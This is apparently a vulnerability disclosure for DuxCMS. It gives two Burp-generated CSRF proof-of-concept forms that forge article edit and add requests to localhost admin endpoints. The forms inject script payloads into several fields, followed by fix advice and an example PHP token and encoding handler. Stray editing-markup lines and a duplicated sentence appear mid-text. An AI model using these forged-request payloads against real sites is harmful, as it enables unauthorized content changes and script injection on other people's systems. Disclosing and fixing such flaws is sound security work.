Log in to the system and add an article like this.

The captured request has an XSS vulnerability in the content parameter.

Generate a CSRF payload using the Burp Suite CSRF PoC generator.

Copy that and edit it like this. This is the edit-article payload:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/DuxCMS/admin.php?r=article/AdminContent/edit" method="POST">
<input type="hidden" name="class_id" value="2" />
<input type="hidden" name="title" value="test333333" />
<input type="hidden" name="image" value="" />
<input type="hidden" name="content" value="sfdadsfadfasfdadsfadf&lt;script&gt;alert(456)&lt;/script&gt; " />
<input type="hidden" name="get_image" value="1" />
<input type="hidden" name="get_image_num" value="1" />
<input type="hidden" name="get_description" value="1" />
<input type="hidden" name="description" value="sfdadsfadfa" />
<input type="hidden" name="keywords" value="sfdadsfadfa" />
<input type="hidden" name="taglink" value="1" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="font_color" value="0" />
<input type="hidden" name="urltitle" value="test2" />
<input type="hidden" name="url" value="" />
<input type="hidden" name="time" value="2020&lt;script&gt;alert(456)&lt;/script&gt; " />
<input type="hidden" name="copyfrom" value="sds&lt;script&gt;alert(456)&lt;/script&gt; " />
<input type="hidden" name="views" value="6" />
<input type="hidden" name="sequence" value="0" />
<input type="hidden" name="tpl" value="" />
<input type="hidden" name="content_id" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Use this if you want to edit the article "test111111".

Run this payload like this and it will edit this article's content successfully.


Access this article and it will alert something like this.
</gml_replace>
<gr_replace lines="44" cat="clarify" orig="this payload is">
This payload adds an article and inputs evil JavaScript in the "content" parameter:

this payload is use add article and input evil javascript in "content" parameter.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/DuxCMS/admin.php?r=article/AdminContent/add" method="POST">
<input type="hidden" name="class_id" value="1" />
<input type="hidden" name="title" value="aaaaaaaaaaaaaaaaaaaaa" />
<input type="hidden" name="image" value="" />
<input type="hidden" name="content" value="sfdadsfadfasfdadsfadf&lt;script&gt;alert(456)&lt;/script&gt; " />
<input type="hidden" name="get_image" value="1" />
<input type="hidden" name="get_image_num" value="1" />
<input type="hidden" name="get_description" value="1" />
<input type="hidden" name="description" value="adfads" />
<input type="hidden" name="keywords" value="adfa" />
<input type="hidden" name="taglink" value="1" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="font_color" value="0" />
<input type="hidden" name="urltitle" value="" />
<input type="hidden" name="url" value="" />
<input type="hidden" name="time" value="2020/01/08 15:49" />
<input type="hidden" name="copyfrom" value="本站" />
<input type="hidden" name="views" value="0" />
<input type="hidden" name="sequence" value="0" />
<input type="hidden" name="tpl" value="" />
<input type="hidden" name="content_id" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Run this payload.

You can see that one article, "aaaaaaaaaaaaaaaaa", has been added.

Access it and it will successfully run the evil JavaScript, like this.

The CSRF and XSS vulnerabilities exist because no token is required for these functions and sensitive characters in input are not filtered.
1) Set a token for this function.
2) Filter sensitive characters in all input data.
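As an added illustration of the two fixes above (example code, not DuxCMS's own), the following PHP handler requires a per-session CSRF token on the add/edit POST and encodes stored fields on output, which is the robust form of "filtering" for HTML contexts. The function names, the `csrf_token` field name and the session layout are assumptions.

```php
<?php
// Added example (not DuxCMS code): CSRF token plus output encoding for an
// article add/edit handler. Function names and session layout are assumptions.
session_start();

// 1) Issue a per-session random token and embed it in the form as a hidden field.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_field(): string {
    return '<input type="hidden" name="csrf_token" value="' . csrf_token() . '" />';
}

// Reject the request unless the submitted token matches the session's token.
// A cross-site form cannot read the victim's session token, so forged POSTs
// like the PoCs above fail here. hash_equals() avoids timing side channels.
function csrf_check(array $post): bool {
    $sent     = $post['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && is_string($sent) && hash_equals($expected, $sent);
}

// 2) Encode every stored field when rendering, so <script> in content, time
//    or copyfrom is displayed as text instead of being executed.
function h(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST)) {
        http_response_code(403);
        exit('invalid CSRF token');
    }
    // ... validate and save $_POST['title'], $_POST['content'], etc. here
}

// Form rendering: the token travels with every legitimate submission.
echo '<form method="POST" action="admin.php?r=article/AdminContent/edit">' . csrf_field() . '</form>';

// Article rendering: a stored payload such as the one in the report is inert.
$content = 'sfdadsfadf<script>alert(456)</script>';
echo '<div class="article">' . h($content) . '</div>';
```

Rotate or scope the token per form if the application needs finer granularity; the per-session token shown is the minimum that defeats the forged requests in this report.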